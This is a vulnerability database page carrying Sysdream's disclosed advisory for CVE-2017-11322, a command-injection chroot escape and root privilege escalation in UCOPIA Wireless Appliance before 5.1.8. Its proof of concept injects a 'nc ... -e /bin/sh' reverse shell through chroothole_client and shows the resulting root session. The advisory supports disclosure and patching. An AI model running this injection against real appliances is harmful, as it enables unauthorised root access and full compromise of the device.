Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNicolas ChatelainPACKETSTORM:144414
HistorySep 29, 2017 - 12:00 a.m.

UCOPIA Wireless Appliance Privilege Escalation

2017-09-2900:00:00
Nicolas Chatelain
packetstormsecurity.com
42

0.003 Low

EPSS

Percentile

65.9%

JSON
`# [CVE-2017-11322] UCOPIA Wireless Appliance < 5.1.8 Privileges Escalation  
  
## Asset description  
  
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.  
  
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.  
  
The affected asset in this report is a WiFi management appliance.  
  
## Vulnerability  
  
CHROOT escape and privileges escalation.  
  
**Threat**  
  
Improper sanitization of system commands in the chroothole_client executable in UCOPIA Wireless Appliance, prior to 5.1.8, allows local attackers to elevate privileges to root user and escape from the *chroot*.  
  
**CVE ID**: CVE-2017-11322  
  
**Access Vector**: local  
  
**Security Risk**: high  
  
**Vulnerability**: CWE-78  
  
**CVSS Base Score**: 8.2 (High)  
  
**CVSS Vector**: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H  
  
### Proof of Concept: chroot escape / privileges escalation  
  
The **chroothole_client** binary is used by the appliance to run programs outside the *chroot*, as the **root** user.  
  
Because of an improper sanitization of system commands, we managed to gain a complete **root** access to the appliance, outside the *chroot*.  
  
```  
$ chroothole_client '/usr/sbin/status'  
is not running ... failed !  
$ chroothole_client '/usr/sbin/status $(which nc)'  
/bin/nc is not running ... failed!  
$ chroothole_client '/usr/sbin/status $(nc 10.0.0.125 4444 -e /bin/sh)'  
```  
  
Attacker terminal :  
  
```  
$ ncat -lvp 4444  
Ncat: Listening on 0.0.0.0:4444  
Ncat: Connection from 10.0.0.1:49156.  
whoami  
root  
```  
  
## Solution  
  
Update to UCOPIA 5.1.8  
  
## Timeline (dd/mm/yyyy)  
  
* 08/03/2017 : Vulnerability discovery.  
* 03/05/2017 : Initial contact.  
* 10/05/2017 : GPG Key exchange.  
* 10/05/2017 : Advisory sent to vendor.  
* 17/05/2017 : Request for feedback.  
* 22/05/2017 : Vendor acknowledge the vulnerabilities.  
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.  
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.  
* 29/09/2017 : Public disclosure.  
  
## Credits  
  
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`

Related

prion 2
cvelist 2
cve 2
nvd 2
exploitpack 1
zdt 1
exploitdb 1
prion
prion
Code injection
2017-10-03 01:29:00
Design/Logic Flaw
2021-02-02 06:15:00
cvelist
cvelist
CVE-2017-11322
2017-10-02 17:00:00
CVE-2020-25035
2021-02-02 05:04:16
cve
cve
CVE-2017-11322
2017-10-03 01:29:01
CVE-2020-25035
2021-02-02 06:15:14
nvd
nvd
CVE-2017-11322
2017-10-03 01:29:01
CVE-2020-25035
2021-02-02 06:15:14
exploitpack
exploitpack
UCOPIA Wireless Appliance 5.1.8 - Local Privilege Escalation
2017-10-02 00:00:00
zdt
zdt
UCOPIA Wireless Appliance Privilege Escalation Vulnerability
2017-09-30 00:00:00
exploitdb
exploitdb
UCOPIA Wireless Appliance &lt; 5.1.8 - Local Privilege Escalation
2017-10-02 00:00:00

0.003 Low

EPSS

Percentile

65.9%

JSON
Related for PACKETSTORM:144414
prion2cvelist2cve2nvd2exploitpack1zdt1exploitdb1